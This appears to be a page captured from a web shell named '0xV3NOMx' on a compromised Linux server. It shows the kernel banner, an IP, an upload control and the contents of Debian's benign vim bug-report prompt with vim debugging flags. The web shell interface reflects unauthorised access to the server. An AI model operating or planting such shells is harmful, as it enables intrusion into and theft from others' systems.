0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 3.149.25.26


Current Path : /usr/share/bug/vim/
Upload File :
Current File : //usr/share/bug/vim/presubj

Before filing a bug, please ensure that your configuration is not the cause of
the bug.  At the very least, this can help narrow down exactly where the bug
exists or what option is causing the behavior.

If the potential bug is part of Vim's basic functionality, run

  (g)vim -u NONE -U NONE -N

If the potential bug is part of Vim's plugins, run

  (g)vim -u NORC -U NORC -N

If the potential bug is part of Vim's filetype-specific functionality, run

  (g)vim -u NORC -U NORC --cmd 'filetype plugin indent on' -N